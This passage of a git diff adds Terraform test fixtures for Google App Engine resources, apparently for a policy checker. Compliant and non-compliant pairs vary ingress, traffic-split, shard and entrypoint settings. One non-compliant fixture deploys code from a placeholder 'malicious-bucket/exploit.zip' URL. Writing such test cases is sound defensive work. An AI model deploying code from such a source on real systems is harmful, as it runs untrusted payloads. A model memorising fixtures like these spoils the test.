"zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/c.tf b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/c.tf new file mode 100644 index 000000000..1d4c8dea5 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/c.tf @@ -0,0 +1,7 @@ +resource "google_app_engine_service_network_settings" "c" { + project = "gcp-project-12345" + service = "internalapp" + network_settings { + ingress_traffic_allowed = "INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/config.tf b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/nc.tf b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/nc.tf new file mode 100644 index 000000000..525ffb2c7 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/nc.tf @@ -0,0 +1,7 @@ +resource "google_app_engine_service_network_settings" "nc" { + project = "gcp-project-12345" + service = "public-app" + network_settings { + ingress_traffic_allowed = "INGRESS_TRAFFIC_ALLOWED_ALL" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/plan.json b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/plan.json new file mode 100644 index 000000000..0330d4b01 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_service_network_settings/network_settings/ingress_traffic_allowed/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/service/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_service_network_settings/service/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_network_settings/service/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/service/c.tf b/inputs/gcp/app_engine/app_engine_service_network_settings/service/c.tf new file mode 100644 index 000000000..1c7645885 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_network_settings/service/c.tf @@ -0,0 +1,7 @@ +resource "google_app_engine_service_network_settings" "c" { + project = "gcp-project-12345" + service = "app-internal-service" + network_settings { + ingress_traffic_allowed = "INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/service/config.tf b/inputs/gcp/app_engine/app_engine_service_network_settings/service/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_network_settings/service/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/service/nc.tf b/inputs/gcp/app_engine/app_engine_service_network_settings/service/nc.tf new file mode 100644 index 000000000..019acd796 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_network_settings/service/nc.tf @@ -0,0 +1,7 @@ +resource "google_app_engine_service_network_settings" "nc" { + project = "gcp-project-12345" + service = "internal-service" + network_settings { + ingress_traffic_allowed = "INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_network_settings/service/plan.json b/inputs/gcp/app_engine/app_engine_service_network_settings/service/plan.json new file mode 100644 index 000000000..4a45c08ec Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_service_network_settings/service/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/c.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/c.tf new file mode 100644 index 000000000..19c2abb1d --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/c.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_service_split_traffic" "c" { + project = "gcp-project-12345" + service = "hardhat-main-api" + migrate_traffic = false + split { + shard_by = "IP" + allocations = { "v1" = 0.5, "v2" = 0.5 } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/config.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/nc.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/nc.tf new file mode 100644 index 000000000..97c55147a --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/nc.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_service_split_traffic" "nc" { + project = "gcp-project-12345" + service = "hardhat-main-api" + migrate_traffic = true + split { + shard_by = "IP" + allocations = { "v1" = 0.5, "v2" = 0.5 } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/plan.json b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/plan.json new file mode 100644 index 000000000..cc0aa2b3d Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_service_split_traffic/migrate_traffic/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/service/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/service/c.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/c.tf new file mode 100644 index 000000000..dd31c7977 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/c.tf @@ -0,0 +1,11 @@ +resource "google_app_engine_service_split_traffic" "c" { + project = "gcp-project-12345" + service = "hardhat-main-api" + split { + shard_by = "IP" + allocations = { + "v1" = 0.5 + "v2" = 0.5 + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/service/config.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/service/nc.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/nc.tf new file mode 100644 index 000000000..e9ecfdc09 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/nc.tf @@ -0,0 +1,10 @@ +resource "google_app_engine_service_split_traffic" "nc" { + project = "gcp-project-12345" + service = "generic-api" + split { + shard_by = "IP" + allocations = { + "v1" = 1.0 + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/service/plan.json b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/plan.json new file mode 100644 index 000000000..74ef0e20a Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_service_split_traffic/service/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/c.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/c.tf new file mode 100644 index 000000000..af03f26d5 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/c.tf @@ -0,0 +1,11 @@ +resource "google_app_engine_service_split_traffic" "c" { + project = "gcp-project-12345" + service = "liveapp" + split { + shard_by = "IP" + allocations = { + "v1" = 0.8 + "v2" = 0.2 + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/config.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/nc.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/nc.tf new file mode 100644 index 000000000..4f7afd444 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/nc.tf @@ -0,0 +1,11 @@ +resource "google_app_engine_service_split_traffic" "nc" { + project = "gcp-project-12345" + service = "liveapp" + split { + shard_by = "IP" + allocations = { + "v1" = 0.0 + "v2" = 1.0 + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/plan.json b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/plan.json new file mode 100644 index 000000000..e0f227966 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/c.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/c.tf new file mode 100644 index 000000000..8e70c93e0 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/c.tf @@ -0,0 +1,11 @@ +resource "google_app_engine_service_split_traffic" "c" { + project = "gcp-project-12345" + service = "liveapp" + split { + shard_by = "IP" + allocations = { + "v1" = 0.8 + "v2" = 0.2 + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/config.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/nc.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/nc.tf new file mode 100644 index 000000000..ed7ca696f --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/nc.tf @@ -0,0 +1,11 @@ +resource "google_app_engine_service_split_traffic" "nc" { + project = "gcp-project-12345" + service = "liveapp" + split { + shard_by = "RANDOM" + allocations = { + "v1" = 0.5 + "v2" = 0.5 + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/plan.json b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/plan.json new file mode 100644 index 000000000..0783a0ffe Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/.terraform.lock.hcl new file mode 100644 index 000000000..5698484ba --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.16.0" + hashes = [ + "h1:o+dOw75zzgpJAUdjEa2a2T62OEThcEr52/4CymRAewA=", + "zh:1cd6f0926e5884998965675d3fbdc5e5abd7335d3f5f83571226be7f50f44443", + "zh:2bc3e3db662df08755af37d23c856f0ec3b8474f629f042ad3af228ff1c3cb5a", + "zh:41869013f786bff8c2ba35e203e84b6c3ec9ff623d6cea6796f5f0204719e907", + "zh:493213e16cb8de6a39b0d6b327faab7909f32ad973fb937d2b3bc4faa07c911a", + "zh:5e9df66ddeef9fcf77acd6185fe880e6b3725b98850ea3b47ef726c44dc04a71", + "zh:6b9e8f83316cf660549a4032342107bb41a7e549eba923f69aefa1ae5ab80a3f", + "zh:6da9316ca7c70d4997c4a62cd534f674e02888e351cb189f7b77b5a03e803773", + "zh:7d1b1dc7c04924dd203e9c5d2041fb732b1e2556b4041c9272a786d37924be7c", + "zh:86dcafef126ad72b592582d8fdb2591d8a2cb45ff85e5f5ff0ac76fbbd7be1bb", + "zh:8a8994c67297336ede3ded9d2558104d49de6fdfa85b88dc99b50030d68158cf", + "zh:a67d8b4774cdb45fb13e73e15885e229561a8b8f46d9f0069b81bf4d3ca03c4a", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/c.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/c.tf new file mode 100644 index 000000000..64d2de356 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/c.tf @@ -0,0 +1,16 @@ +resource "google_app_engine_standard_app_version" "c" { + project = "gcp-project-12345" + version_id = "v1" + service = "default" + runtime = "nodejs20" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/appengine-static-content/hello-world.zip" + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/config.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/nc.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/nc.tf new file mode 100644 index 000000000..6bfac07e5 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/nc.tf @@ -0,0 +1,16 @@ +resource "google_app_engine_standard_app_version" "nc" { + project = "gcp-project-12345" + version_id = "v1" + service = "default" + runtime = "nodejs20" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/malicious-bucket/exploit.zip" + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/plan.json b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/plan.json new file mode 100644 index 000000000..465735a27 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/c.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/c.tf new file mode 100644 index 000000000..2acf651aa --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/c.tf @@ -0,0 +1,16 @@ +resource "google_app_engine_standard_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs20" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/appengine-static-content/hello-world.zip" + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/config.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/nc.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/nc.tf new file mode 100644 index 000000000..badb7504f --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/nc.tf @@ -0,0 +1,16 @@ +resource "google_app_engine_standard_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs20" + + entrypoint { + shell = "bash ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/appengine-static-content/hello-world.zip" + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/plan.json b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/plan.json new file mode 100644 index 000000000..eecaf865a Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/.terraform.lock.hcl new file mode 100644 index 000000000..5698484ba --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.16.0" + hashes = [ + "h1:o+dOw75zzgpJAUdjEa2a2T62OEThcEr52/4CymRAewA=", + "zh:1cd6f0926e5884998965675d3fbdc5e5abd7335d3f5f83571226be7f50f44443", + "zh:2bc3e3db662df08755af37d23c856f0ec3b8474f629f042ad3af228ff1c3cb5a", + "zh:41869013f786bff8c2ba35e203e84b6c3ec9ff623d6cea6796f5f0204719e907", + "zh:493213e16cb8de6a39b0d6b327faab7909f32ad973fb937d2b3bc4faa07c911a", + "zh:5e9df66ddeef9fcf77acd6185fe880e6b3725b98850ea3b47ef726c44dc04a71", + "zh:6b9e8f83316cf660549a4032342107bb41a7e549eba923f69aefa1ae5ab80a3f", + "zh:6da9316ca7c70d4997c4a62cd534f674e02888e351cb189f7b77b5a03e803773", + "zh:7d1b1dc7c04924dd203e9c5d2041fb732b1e2556b4041c9272a786d37924be7c", + "zh:86dcafef126ad72b592582d8fdb2591d8a2cb45ff85e5f5ff0ac76fbbd7be1bb", + "zh:8a8994c67297336ede3ded9d2558104d49de6fdfa85b88dc99b50030d68158cf", + "zh:a67d8b4774cdb45fb13e73e15885e229561a8b8f46d9f0069b81bf4d3ca03c4a", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/c.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/c.tf new file mode 100644 index 000000000..18d2f5637 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/c.tf @@ -0,0 +1,14 @@ +resource 